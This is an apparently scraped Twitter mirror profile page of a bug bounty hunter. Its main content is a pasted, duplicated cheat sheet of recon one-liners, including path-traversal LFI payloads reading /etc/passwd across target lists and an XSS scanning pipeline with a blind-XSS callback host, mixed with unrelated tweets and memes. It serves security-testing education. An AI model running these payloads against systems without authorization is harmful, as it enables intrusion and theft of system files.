Olivia
Online
Itachi Uchiha
@SunilPrashanth4
Automation Tester | Ethical Hacker | Bug Bounty Hunter | CTF Player
Eat | Sleep | Hack | Repeat
Kono Te Boku Wa💚✨
Chennai, India
Joined December 2016
229 Following
35 Followers
123 Posts
Pinned Tweet
Inime notes eh vekka matten nu sollitu odittan 🤣😭🤣😭
🐣 🌷 Easter Giveaway 🌷🐣
I’m giving away one CompTIA Security+ Exam Voucher!
How to enter:
•Like & RT this post
•Comment or tag a friend
Winners will be announced Friday
Good luck and Happy Easter!
I've made over 100k on SSRF vulnerabilities.
They aren't always as simple as pointing it at localhost or AWS Metadata service.
Here are some tricks I've picked up over the past 5 years of web app testing:
# **Awesome Advanced Bug Bounty One-Liners**
**For elite recon, subdomain enumeration, LFI, and takeovers. Optimized for speed, signal, and stealth.**
---
## **One-Line Recon Using `pd` Tools**
```bash
subfinder -d https://t.co/uswJhBLJXF -all | anew subs.txt \
&& shuffledns -d https://t.co/uswJhBLJXF -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt \
&& dnsx -l subs.txt -r resolvers.txt -silent | anew resolved.txt \
&& naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt \
&& httpx -l ports.txt -silent | anew alive.txt \
&& katana -list alive.txt -kf all -jc | anew urls.txt \
&& nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt
```
---
## **Subdomain Enumeration**
### **Juicy Subdomains**
```bash
subfinder -d https://t.co/axAPlulNpQ -silent | dnsx -silent | cut -d ' ' -f1 \
| grep --color=auto -Ei 'api|dev|stg|test|admin|demo|stage|pre|vpn'
```
### **Online Intelligence Sources**
- **https://t.co/jAGHHZtWeE**
```bash
curl -s https://t.co/tq8S4NWLHp | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
```
- **https://t.co/LpbyKxszay**
```bash
curl -s "https://t.co/OE0qR90HDg" \
| grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **RedHunt Labs**
```bash
curl -s --url 'https://t.co/CytBwhOmEC' \
-H 'X-BLOBR-KEY: API_KEY' | jq -r '.subdomains[]'
```
- **Nmap NSE**
```bash
nmap --script hostmap-crtsh.nse https://t.co/axAPlulNpQ
```
- **CertSpotter**
```bash
curl -s "https://t.co/pUUT7Y6oLN" \
| jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **Wayback Machine**
```bash
curl -s "https://t.co/MQOIqfjZVI" \
| sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```
- **JLDC**
```bash
curl -s "https://t.co/InurYe65wh" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **https://t.co/3SNVM49m71**
```bash
curl -s "https://t.co/CRvLJfSWd2" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
- **ThreatMiner**
```bash
curl -s "https://t.co/Vl4K1jpfb7" | jq -r '.results[]' \
| grep -o "\w.*https://t.co/axAPlulNpQ" | sort -u
```
- **ThreatCrowd**
```bash
curl -s "https://t.co/2QueBdr500" | jq -r '.subdomains[]?' | sort -u
```
- **HackerTarget**
```bash
curl -s "https://t.co/PjInwgSS18"
```
- **AlienVault**
```bash
curl -s "https://t.co/xka18lSPBi" \
| grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u
```
- **Censys (CLI must be installed and auth configured)**
```bash
censys subdomains https://t.co/axAPlulNpQ
```
---
## **Subdomain Takeover Detection**
```bash
cat subs.txt | xargs -P50 -I% bash -c 'dig % | grep CNAME' \
| awk '{print $1}' | sed 's/\.$//g' \
| httpx -silent -status-code -cdn -csp-probe -tls-probe
```
---
## **LFI Payload Scanning**
### **Using `gf`, `httpx`, and `/etc/passwd` filter**
```bash
cat targets.txt | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 \
-random-agent -x GET,POST -tech-detect -status-code -follow-redirects \
-mc 200 -mr "root:[x*]:0:0:"
```
### **With `qsreplace` for fast payload injection**
```bash
cat targets.txt | gau | gf lfi | qsreplace "/etc/passwd" \
| xargs -I% -P25 sh -c 'curl -s "%" | grep -q "root:x" && echo "[+] VULN: %"'
```
### **Raw Curl LFI Bypass with Path Traversal**
```bash
cat targets.txt | while read host; do \
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" \
| grep "root:*" && echo -e "\n$host \033[0;31mVULNERABLE"; done
**✅The best one liner XSS **
`subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|svg|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter/?q=1`
## Shodan Cli
```
shodan search https://t.co/KfCB0DKXd9:"https://t.co/axAPlulNpQ" --fields ip_str | anew ips.txt
```
#bugbountytips #bugbounty #hackerone
![TheMsterDoctor1's tweet photo. # **Awesome Advanced Bug Bounty One-Liners**
**For elite recon, subdomain enumeration, LFI, and takeovers. Optimized for speed, signal, and stealth.**
---
## **One-Line Recon Using `pd` Tools**
```bash
subfinder -d https://t.co/uswJhBLJXF -all | anew subs.txt \
&& shuffledns -d https://t.co/uswJhBLJXF -r resolvers.txt -w n0kovo_subdomains_huge.txt | anew subs.txt \
&& dnsx -l subs.txt -r resolvers.txt -silent | anew resolved.txt \
&& naabu -l resolved.txt -nmap -rate 5000 | anew ports.txt \
&& httpx -l ports.txt -silent | anew alive.txt \
&& katana -list alive.txt -kf all -jc | anew urls.txt \
&& nuclei -l urls.txt -es info,unknown -ept ssl -ss template-spray | anew nuclei.txt
```
---
## **Subdomain Enumeration**
### **Juicy Subdomains**
```bash
subfinder -d https://t.co/axAPlulNpQ -silent | dnsx -silent | cut -d ' ' -f1 \
| grep --color=auto -Ei 'api|dev|stg|test|admin|demo|stage|pre|vpn'
```
### **Online Intelligence Sources**
- **https://t.co/jAGHHZtWeE**
```bash
curl -s https://t.co/tq8S4NWLHp | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
```
- **https://t.co/LpbyKxszay**
```bash
curl -s "https://t.co/OE0qR90HDg" \
| grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **RedHunt Labs**
```bash
curl -s --url 'https://t.co/CytBwhOmEC' \
-H 'X-BLOBR-KEY: API_KEY' | jq -r '.subdomains[]'
```
- **Nmap NSE**
```bash
nmap --script hostmap-crtsh.nse https://t.co/axAPlulNpQ
```
- **CertSpotter**
```bash
curl -s "https://t.co/pUUT7Y6oLN" \
| jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **Wayback Machine**
```bash
curl -s "https://t.co/MQOIqfjZVI" \
| sed -e 's_https*://__' -e "s/\/.*//" | sort -u
```
- **JLDC**
```bash
curl -s "https://t.co/InurYe65wh" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
```
- **https://t.co/3SNVM49m71**
```bash
curl -s "https://t.co/CRvLJfSWd2" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
```
- **ThreatMiner**
```bash
curl -s "https://t.co/Vl4K1jpfb7" | jq -r '.results[]' \
| grep -o "\w.*https://t.co/axAPlulNpQ" | sort -u
```
- **ThreatCrowd**
```bash
curl -s "https://t.co/2QueBdr500" | jq -r '.subdomains[]?' | sort -u
```
- **HackerTarget**
```bash
curl -s "https://t.co/PjInwgSS18"
```
- **AlienVault**
```bash
curl -s "https://t.co/xka18lSPBi" \
| grep -o '"hostname": *"[^"]*' | sed 's/"hostname": "//' | sort -u
```
- **Censys (CLI must be installed and auth configured)**
```bash
censys subdomains https://t.co/axAPlulNpQ
```
---
## **Subdomain Takeover Detection**
```bash
cat subs.txt | xargs -P50 -I% bash -c 'dig % | grep CNAME' \
| awk '{print $1}' | sed 's/\.$//g' \
| httpx -silent -status-code -cdn -csp-probe -tls-probe
```
---
## **LFI Payload Scanning**
### **Using `gf`, `httpx`, and `/etc/passwd` filter**
```bash
cat targets.txt | gau | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 \
-random-agent -x GET,POST -tech-detect -status-code -follow-redirects \
-mc 200 -mr "root:[x*]:0:0:"
```
### **With `qsreplace` for fast payload injection**
```bash
cat targets.txt | gau | gf lfi | qsreplace "/etc/passwd" \
| xargs -I% -P25 sh -c 'curl -s "%" | grep -q "root:x" && echo "[+] VULN: %"'
```
### **Raw Curl LFI Bypass with Path Traversal**
```bash
cat targets.txt | while read host; do \
curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" \
| grep "root:*" && echo -e "\n$host \033[0;31mVULNERABLE"; done
**✅The best one liner XSS **
`subfinder -dL domainlist1.txt | dnsx | shuf | (gau | | hakrawler) | anew | egrep -iv "\.(jpg|jpeg|gif|tif|tiff|png|ttf|woff|woff2|php|ico|pdf|svg|txt|js)$" | urless | nilo | dalfox pipe -b https://xss.hunter/?q=1`
## Shodan Cli
```
shodan search https://t.co/KfCB0DKXd9:"https://t.co/axAPlulNpQ" --fields ip_str | anew ips.txt
```
#bugbountytips #bugbounty #hackerone](https://pbs.twimg.com/media/GnGYiK1XcAAJVWq.jpg)
Who to follow
I not only hunt for sqli, I don't post !!
XSS + Account takeover!
Never XSS be alone! Try to chain something!!
TeamMate Can Completely Takeover SuperAdmin Account! (this pop up from super admin panel)
Hacking is FUN!!!
Very basic payload worked:)
#xss #bugbounty #ato
You can now exploit SQL Injection vulnerabilities with HackerGPT!
https://t.co/kUCcDt015n
the only serial i used to watch 🌚
@YouTube
He did'nt promoted any online betting or gambling apps, just he explained about how harmful those apps are and how they're being operated. But it's very sad that those eye openers are getting banned and striked due to your your poor way of reviewing the video.
@YouTubeIndia @TeamYouTube, I kindly request a manual review of the content. Because, The video's context contradicts its claimed community guidelines strike!
@Anticringeforc3 @SavukkuOfficial But it's not surprising because what can expect from the guy who stole a file for money? and puluthifies it by calling himself as "That Suspended Clerk" 😂
Doesn't matter which team wins,I am here for entertainment
@ICICILombard @subramania20801 So you people will reply only when it is addressed in the public forum, but not when it is needed?
Future King of the Pirates
Monkey D. Luffy 👑
Episode Dropping tomorrow night 11:30pm
POV: That one senior dood in office when a girl asks doubt vs a boy asks doubt😭
When your Tinder/Bumble match has They/Them as pronouns
But only one guy with blue hair showed up on the date😭🤕
#bumble #dankmemes #vijay #ponapogattum
Looks like she can have healthy baby. IYKYK!
Now this is what Vijay anna taught us in Kaththi... Thannoda pasi theendhu ponadhuku apuram balance irrukuradha office mate ku kuduthurukka andha husbands'ah paaratalame frands💥
Last Seen Users on Sotwe
Most Popular Users
Elon Musk 
@elonmusk
240.3M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.6M followers
Cristiano Ronaldo
@cristiano
109.6M followers
Narendra Modi
@narendramodi
106.9M followers
Rihanna
@rihanna
97.4M followers
NASA
@nasa
92.1M followers
Justin Bieber
@justinbieber
90.7M followers
KATY PERRY
@katyperry
87.2M followers
Taylor Swift
@taylorswift13
81M followers
Lady Gaga
@ladygaga
72.5M followers
Kim Kardashian
@kimkardashian
69.5M followers
Virat Kohli
@imvkohli
69.1M followers
YouTube
@youtube
68.6M followers
Bill Gates
@billgates
63.6M followers
The Ellen Show
@theellenshow
62.5M followers
CNN
@cnn
61.9M followers
Neymar Jr
@neymarjr
61.7M followers
X
@x
60.9M followers
Selena Gomez
@selenagomez
60.3M followers